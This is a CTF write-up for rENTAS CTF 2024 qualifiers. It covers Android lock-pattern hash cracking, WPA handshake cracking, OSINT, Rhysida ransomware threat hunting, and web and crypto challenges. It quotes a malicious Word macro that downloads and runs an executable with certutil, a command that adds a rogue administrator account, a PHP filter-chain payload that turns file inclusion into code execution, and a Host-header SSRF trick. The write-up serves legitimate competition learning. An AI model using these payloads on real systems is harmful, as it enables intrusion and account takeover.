
rENTAS CTF 2024 (Qualifiers) - Writeups

This is a writeup for most of the challenges from rENTAS CTF 2024. This was the very first CTF of 2024, and together with my Sunway friends @Shen and @ren we managed to qualify for the CTF finals. In my opinion the CTF experience was overall very poor: the challenges were really bad and guessy, hints were gatekept by the authors for some reason, and the 24-hour CTF was held on a weekday (sleep is for the weak, right).

Mobile [Forensics]

Flag: RWSC{875463120}

We are given a report on an Android forensics case, specifically a Lenovo P70. Before the hints were given, I actually read the report slowly TWICE and found nothing of interest. I noticed several artifacts like photos of a car, photos of Malaysian guys, boot-up screenshots, and several Android icon caches.

[image: mobile1]

With my last attempt, I was blessed with a hint from the authors: this video about cracking lock patterns on an Android phone by analyzing its system files. So the hint made it pretty obvious that the password we are looking for is a lock pattern, not a PIN or a password string.

[image: mobile2]

From the video, it seems that the gesture.key file is where lock patterns are stored; however, the Lenovo P70 does not have this file, since it was not mentioned anywhere in the report. So I did some research on Android forensics, found this interesting blog, and learned that the pattern is sometimes stored in /data/system/password.key instead. Filtering the report for /data/system gave me the hex value of the lock pattern.

[image: mobile3]

Looking for a way to crack the hex value like the guy in the video, I went online and found the perfect tool for cracking exactly this kind of hash, 8e7e00c0bd5ce227f7be204c8b7c159669c776d4. After running the script, the flag can be obtained.

└─$ python gesturecrack.py -r 8e7e00c0bd5ce227f7be204c8b7c159669c776d4

        The Lock Pattern code is [8, 7, 5, 4, 6, 3, 1, 2, 0]

        For reference here is the grid (starting at 0 in the top left corner):

        |0|1|2|
        |3|4|5|
        |6|7|8|
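As an added example (my code, not the writeup's and not the gesturecrack.py tool it used), here is how such a cracker works and why the stored hash is so weak: the classic gesture.key is the unsalted SHA-1 of the dot indices as raw bytes, and the whole keyspace of 4 to 9 dot patterns is under a million sequences, so it can be enumerated directly without any wordlist. The hash constant is the one quoted above; the dot-skipping rule in is_valid_pattern is my reading of how the Android lock screen behaves.

```python
import hashlib
from itertools import permutations

# Hash quoted from the forensic report in the writeup above.
TARGET_HASH = "8e7e00c0bd5ce227f7be204c8b7c159669c776d4"

def is_valid_pattern(points):
    """Android's drawing rule (assumption from how the lock screen behaves):
    dots are numbered 0-8 row by row, every dot is used at most once, and a
    stroke whose midpoint lands exactly on a dot may only be drawn once that
    dot is already part of the pattern (you cannot skip an unvisited dot)."""
    if len(set(points)) != len(points):
        return False
    seen = set()
    for a, b in zip(points, points[1:]):
        seen.add(a)
        ra, ca = divmod(a, 3)
        rb, cb = divmod(b, 3)
        if (ra + rb) % 2 == 0 and (ca + cb) % 2 == 0:
            mid = ((ra + rb) // 2) * 3 + (ca + cb) // 2
            if mid not in seen:
                return False
    return True

def pattern_hash(points):
    """gesture.key holds the unsalted SHA-1 of the dot indices as raw bytes."""
    return hashlib.sha1(bytes(points)).hexdigest()

def crack_pattern(target_hex, min_len=4, max_len=9):
    """Enumerate every valid pattern, shortest first, and return the one whose
    SHA-1 equals target_hex (None if nothing matches). The keyspace is tiny,
    which is exactly why an unsalted hash over it offers no protection."""
    target_hex = target_hex.lower()
    for length in range(min_len, max_len + 1):
        for cand in permutations(range(9), length):
            if is_valid_pattern(cand) and pattern_hash(cand) == target_hex:
                return list(cand)
    return None

if __name__ == "__main__":
    print("Lock pattern:", crack_pattern(TARGET_HASH))
```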

Medellín Cartel [OSINT]

Flag: RWSC{Bl4cky_S1c4r1o}

We are given an image of the Medellín Cartel family tree. No offence, but this OSINT challenge was guessy: without the hints provided, I would never have known we should be looking for Nelson Hernandez, and especially not on a specific social media platform.

[image: osint1]

However, since we already had the hint, it was actually super simple. First, find his Instagram profile; thank god he was the only person with "blacky", otherwise it would have taken a while.

[image: osint2]

[image: osint3]

Inspecting the source code, or "Instagram metadata", the flag can be found. Overall, not a great OSINT challenge compared to the next one.

[image: osint4]

Cali Cartel [OSINT]

Flag: RWSC{C4L1_C4RT3L_PWN3D}

We are given an image of a strange looking business operation (probably drugs). Reading the challenge name, it seems that I must be looking for information on the Cali Cartel.

[image: cartel1]

Doing some research on them, it seems that their downfall was caused by an insider betrayal, specifically by Jorge Salcedo. So I went ahead and looked up the betrayer's name and got lucky with some Google dorking.

[image: cartel2]

Hidden Discord [Misc]

Flag: RWSC{r34d_d15c0rd_d3v3l0p3r_API_r3f3r3nc3}

We are given a link to join a Discord server (https://discord.gg/7aMtftbDY4). Inside the server, the admin mentioned that there are 5 parts of the flag throughout the server.

[image: discord1]

Part 1 of the flag was easily noticed in the chat room of the voice channel. Similarly, part 3 can be easily found in the events tab.

[image: discord2]

[image: discord3]

While getting the flag parts we actually can find several hints placed in the Discord server.

Find the CATegory? 🐈‍⬛🐈
roles ❓

For parts 2 and 4, my teammate @Shen helped find them with special plugins. After finding this video about a BetterDiscord plugin that shows hidden channels, he managed to get parts 2 and 4 of the flag.

[image: discord4]

The last part of the flag is in the server icon. So just use Discord in the browser, inspect the icon, and change its size in the URL.

https://cdn.discordapp.com/icons/1202263455466541096/bfa6d5f2ed8067d3367791ed5b4d6941.webp?size=1024

[image: discord5]

Last Hope [Networking]

Flag: RWSC{anonymous}

We are given a pcap file consisting only of wireless packets. Since the flag is the user's password, it was obvious we had to crack the password with aircrack-ng.

└─$ aircrack-ng RAWSECWIFI-01.cap -w /usr/share/wordlists/rockyou.txt
Reading packets, please wait...
Opening RAWSECWIFI-01.cap
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Read 25995 packets.

   #  BSSID              ESSID                     Encryption

   1  7E:7F:A3:4C:5C:1A  Rawsec Command Center     WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening RAWSECWIFI-01.cap
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Resetting EAPOL Handshake decoder state.
Read 25995 packets.

1 potential targets


                               Aircrack-ng 1.7 

      [00:00:05] 6108/14344392 keys tested (1126.36 k/s) 

      Time left: 3 hours, 32 minutes, 9 seconds                  0.04%

                           KEY FOUND! [ anonymous ]


      Master Key     : 94 7D 53 8E F7 F3 22 52 BC 89 D4 B7 DB BE 77 E3 
                       A7 A8 D2 89 9A 1B 58 43 84 E3 4A 52 D5 90 BB F5 

      Transient Key  : 8E 41 35 02 02 91 DD EA AE 6F 04 1C 93 7E 66 D7 
                       DB 2C 1E 13 D7 54 9E 77 83 D3 F2 1E 08 62 9B 59 
                       53 12 38 DA 5E E0 50 BF 70 52 31 67 F9 69 91 DD 
                       FF 54 08 E1 59 37 92 F9 12 5E D6 1B 3F FE 43 AC 

      EAPOL HMAC     : 59 CD 37 EF 5A E7 87 0E 76 54 AE E6 44 CB 90 7E 
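To make clear what aircrack-ng was doing with rockyou.txt, the following added example (my code, not part of the writeup) derives the WPA/WPA2-PSK Pairwise Master Key the way the standard defines it, PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt, and compares it with the Master Key printed in the output above; the ESSID, passphrase and key bytes are taken from that output.

```python
import hashlib
import hmac

# Values quoted from the aircrack-ng output above.
ESSID = "Rawsec Command Center"
CRACKED_PASSPHRASE = "anonymous"
REPORTED_MASTER_KEY = bytes.fromhex(
    "947d538ef7f32252bc89d4b7dbbe77e3a7a8d2899a1b584384e34a52d590bbf5"
)

def derive_pmk(passphrase, essid):
    """WPA/WPA2-PSK Pairwise Master Key (IEEE 802.11i): PBKDF2-HMAC-SHA1 over
    the passphrase with the ESSID as salt, 4096 iterations, 32 bytes out."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), essid.encode("utf-8"), 4096, 32
    )

def first_matching_passphrase(candidates, essid, target_pmk):
    """The wordlist loop reduced to its expensive core: one PBKDF2 per candidate.

    aircrack-ng does not know the PMK up front; for each candidate it derives
    the PTK from the handshake nonces and checks the EAPOL MIC instead, but the
    per-candidate cost (4096 HMAC-SHA1 rounds) is the same, which is why the
    ETA above was hours for the 14 million entries of rockyou.txt."""
    for passphrase in candidates:
        if hmac.compare_digest(derive_pmk(passphrase, essid), target_pmk):
            return passphrase
    return None

if __name__ == "__main__":
    pmk = derive_pmk(CRACKED_PASSPHRASE, ESSID)
    print("derived PMK   :", pmk.hex())
    print("matches output:", hmac.compare_digest(pmk, REPORTED_MASTER_KEY))
```

The defender's takeaway is that a PSK found in a public wordlist is recoverable offline from a single captured handshake, so only a long random passphrase (or WPA3-SAE) changes the economics.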

Скорпион [Threat Hunt]

Flag: RWSC{rhysidafc6lm7qa2mkiukbezh7zuth3i4wof4mh2audkymscjm6yegad}

We are given a text file about a real ransomware.

In one investigation, xxxxxxx actors created two folders in the C:\ drive labeled in and out, which served as a staging directory (central location) for hosting malicious executables. The in folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out folder contained various files listed in Table 2 below. For encryption process - After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands are not obfuscated, displayed as plain-text strings and executed via cmd.exe. The encryptor allows arguments -d (select a directory) and -sr (file deletion), defined by the authors of the code as parseOptions. After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.

Table 2: Malicious Executables Affiliated with xxxxxxx Infections

conhost.exe
6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010
A ransomware binary.

psexec.exe
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
A file used to execute a process on a remote or local host.

S_0.bat
1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597
A batch script likely used to place 1.ps1 on victim systems for ransomware staging purposes [T1059.003].

1.ps1
4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183
Identifies an extension block list of files to encrypt and not encrypt.

S_1.bat
97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4
A batch script that copies conhost.exe (the encryption binary) on an imported list of host names within the C:\Windows\Temp directory of each system.

S_2.bat
918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1
Executes conhost.exe on compromised victim systems, which encrypts and appends the extension of .groupname (censored) across the environment.

Reading it, it seems that they are referring to a fairly recent ransomware called Rhysida. I found a blog that talks about it and lists all the C2 IPs it connects to. I also found out that they operate on the dark web, where they sell the information they stole from victims.

<img src="/assets/posts/rentasctf2024/th1.png" width=50% height=50%>

This was kind of guessy because nowhere in the question was Telegram mentioned, but after receiving the hint I went on Telegram, searched for Rhysida, and found a chat room with a sample flag.

<img src="/assets/posts/rentasctf2024/th2.jpg" width=50% height=50%>

Reading the chat, it seems that the flag is the mirror link of their onion page. This can be obtained from many sources like this one.

PS: Random stuff I encountered:

  • I found out the ransomware also attacked Indah Water Konsortium in Malaysia.
  • I messaged a random Telegram bot when finding the chat room.

Resign Letter [Rev]

Flag: RWSC{p@ss123}

We are given a weird document template file created by Microsoft Word. When opening it, macros can be found.

[image: rev1]

Opening the macro named Test as shown below provides us with the following code.

[image: rev2]

Shell ("cmd /c certutil.exe -urlcache -split -f https://github.com/fareedfauzi/Adv_Sim/raw/main/lenovo.exe %temp%\lenovo.exe")
Shell ("cmd /c %temp%\lenovo.exe")

Downloading the malicious binary and running strings on it, we can see that it executes:

cmd.exe /c net user f14g cEBzczEyMw== /ADD && net localgroup Administrators f14g /ADD

It tries to add the user f14g with password cEBzczEyMw== to the local machine and add it to the Administrators group. Decode the password from base64 for the flag.
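The command recovered with strings is easy to triage automatically. This added example (my code, not part of the writeup) parses net user / net localgroup lines out of a command line, decodes the password when it is well-formed base64, and reports which groups the new account is added to; the first sample is the command above, the second is constructed.

```python
import base64
import binascii
import re

# Constructed samples: the first is the command the writeup recovered with
# strings; the second is made up to show a password that is not base64.
SAMPLE_COMMANDS = [
    "cmd.exe /c net user f14g cEBzczEyMw== /ADD && net localgroup Administrators f14g /ADD",
    "cmd.exe /c net user svc_backup Winter2024! /add",
]

NET_USER_RE = re.compile(r"net\s+user\s+(\S+)\s+(\S+)\s+/add\b", re.IGNORECASE)
NET_GROUP_RE = re.compile(r"net\s+localgroup\s+(\S+)\s+(\S+)\s+/add\b", re.IGNORECASE)

def maybe_base64(token):
    """Decode token if it is well-formed base64 of printable ASCII, else None.

    This is a heuristic: a short plain password such as 'abcd' is also valid
    base64, so the caller keeps both the raw and the decoded form."""
    if len(token) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def parse_account_creation(cmdline):
    """Extract the account a 'net user ... /add' command creates, or None."""
    m = NET_USER_RE.search(cmdline)
    if not m:
        return None
    user, raw_password = m.groups()
    # Only count group additions that name the same account.
    groups = [g for g, u in NET_GROUP_RE.findall(cmdline) if u.lower() == user.lower()]
    return {
        "user": user,
        "raw_password": raw_password,
        "decoded_password": maybe_base64(raw_password),
        "groups": groups,
    }

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(parse_account_creation(cmd))
```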

Bring Your Own Script [Web]

Flag: RWSC{J4CKP0T}

We are given a website that has multiple directories, and the flag should be located in one of them. A script can be written to brute-force each path; it turned out the flag was actually an image.

import sys
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, unquote

visited_links = set()

def get_links(url):
    """Return every href on the page, resolved against the page URL."""
    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a', href=True)
        return [urljoin(url, link['href']) for link in links]
    except requests.exceptions.RequestException as e:
        print(f"Error retrieving links from {url}: {e}")
        return []

def no_directories_found(soup):
    # A page that is neither a listing (has directory links) nor an empty
    # listing ("No directories found.") must be the page holding the flag.
    return "No directories found." not in soup.get_text() and not soup.find_all(class_="directory-link")

def visit_links_recursive(url):
    """Depth-first walk of the directory tree until a non-listing page shows up."""
    if url in visited_links:
        return

    print(f"Visiting: {unquote(url)}")

    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, 'html.parser')

        if no_directories_found(soup):
            print(f"Flag on: {url}")
            sys.exit()

        visited_links.add(url)

        links = get_links(url)

        for link in links:
            visit_links_recursive(link)

    except requests.exceptions.RequestException as e:
        print(f"Error visiting {url}: {e}")

def main():
    starting_url = 'https://byos.ctf.rawsec.com/root/'
    visit_links_recursive(starting_url)

if __name__ == "__main__":
    main()
...
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😌/🥺😄/🤒🤯🤕/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😌/🥺😄/🤒🤯🤕/😏/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/😳🤕/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/😳🤕/👾/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/😅/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/😅😡/index.php
Visiting: https://byos.ctf.rawsec.com/root/🤤🤕😃/😔😁😕😵/😺😪🥴😇/🥰🥶🤣😂/🤧😅/index.php
Flag on: https://byos.ctf.rawsec.com/root/%F0%9F%A4%A4%F0%9F%A4%95%F0%9F%98%83/%F0%9F%98%94%F0%9F%98%81%F0%9F%98%95%F0%9F%98%B5/%F0%9F%98%BA%F0%9F%98%AA%F0%9F%A5%B4%F0%9F%98%87/%F0%9F%A5%B0%F0%9F%A5%B6%F0%9F%A4%A3%F0%9F%98%82/%F0%9F%A4%A7%F0%9F%98%85/index.php

[image: web1]

simplelazy [Web]

Flag: RWSC{S1MPL3_4ND_L4ZY}

We are given a PHP website that loads files through a GET parameter. A vulnerability exists in PHP where RCE can be achieved if the attacker controls the path used in include(), which is the method the website uses to include files.

[image: web2]

[image: web3]

We can use a PHP filter chain generator script.

Command payload

python script.py --chain "<?php system('cat e* | base64');?>"

[image: web4]

La Itu Je! [Web] 🩸

Flag: RWSC{b045887cbadfda25b29db243a18de38cb1cbfb14}

We are given a website that has a login form. First, register an account under /register.php (the endpoint can be fuzzed or located in a comment on the login page).

[image: web5]

Accessing the get-flag endpoint requires a code to be submitted. Viewing the page source, we can find an obfuscated JS file which reveals that we have to send a POST request to dashboard.php to get a valid code.

[image: web6]

After that, we were stuck, and only once hints were released did we solve the challenge. The server will curl the value in the Host header. After getting the correct code, we can put our own server in the Host header to receive the flag.

[image: web7]

[image: web8]

[image: web9]

Shoutout to @Shen for the first blood!

[image: fb]

round and round [Cryptography]

Flag: RWSC{PIZZINI_CIPHER_WAS_EAZY}

We are given the ciphertext 2126226{19122929121712_6121911821_26422_842928}. Since we know the flag format, we can assume that RWSC = 2126226. Looking at this logic for a while, he noticed that the numbers could act as hex values instead, where an extra 0 is padded onto the 6, for example: 21 26 22 06. So he made a script to build the flag.

# Each value maps to a letter via chr(value + 61); every group is followed by
# "_", which is why the flag prints with a trailing underscore.
groups = [
    "21 26 22 06",
    "19 12 29 29 12 17 12",
    "06 12 19 11 08 21",
    "26 04 22",
    "08 04 29 28",
]

for group in groups:
    for value in group.split():
        print(chr(int(value) + 61), end="")
    print("_", end="")

print()
└─$ python pizza.py 
RWSC_PIZZINI_CIPHER_WAS_EAZY_
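The script above needs the digit groups split by hand. As an added example (my code, not from the writeup), the decoder below works on the raw ciphertext and resolves the missing zero padding automatically: under chr(value + 61) only the values 4..29 map to A..Z, so a two-digit read is correct exactly when it falls in 10..29 and otherwise the digit stands alone. The encoder shows the round trip in the challenge's unpadded style.

```python
# Ciphertext as given in the challenge (quoted from the writeup above).
CIPHERTEXT = "2126226{19122929121712_6121911821_26422_842928}"
OFFSET = 61                  # chr(value + OFFSET): 4 -> 'A', ..., 29 -> 'Z'
LETTER_VALUES = range(4, 30)  # the only values that map to capital letters

def tokenize(digits):
    """Split a run of digits into letter values without relying on zero padding.

    Only 4..29 map to capital letters, so a two-digit read is valid exactly
    when it is 10..29; anything larger means the first digit stands alone
    (the '6' in '2126226'). Runs that fit neither rule cannot be decoded."""
    values, i = [], 0
    while i < len(digits):
        pair = int(digits[i:i + 2]) if i + 1 < len(digits) else -1
        single = int(digits[i])
        if pair in LETTER_VALUES:
            values.append(pair)
            i += 2
        elif single in LETTER_VALUES:
            values.append(single)
            i += 1
        else:
            raise ValueError(f"cannot decode digits at offset {i}: {digits[i:]!r}")
    return values

def decode(ciphertext):
    """Decode digit runs to letters; other characters ({ } _) pass through."""
    out, run = [], ""
    for ch in ciphertext + "\0":          # sentinel flushes the final run
        if ch.isdigit():
            run += ch
            continue
        out.extend(chr(v + OFFSET) for v in tokenize(run))
        run = ""
        if ch != "\0":
            out.append(ch)
    return "".join(out)

def encode(plaintext):
    """Inverse mapping in the challenge's unpadded style (C -> '6', not '06')."""
    out = []
    for ch in plaintext:
        if "A" <= ch <= "Z":
            out.append(str(ord(ch) - OFFSET))
        elif ch.isdigit():
            raise ValueError("digits cannot be represented in this scheme")
        else:
            out.append(ch)
    return "".join(out)

if __name__ == "__main__":
    print(decode(CIPHERTEXT))
```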

Scoreboard

Team HLG

[image: hlg]

This post is licensed under CC BY 4.0 by the author.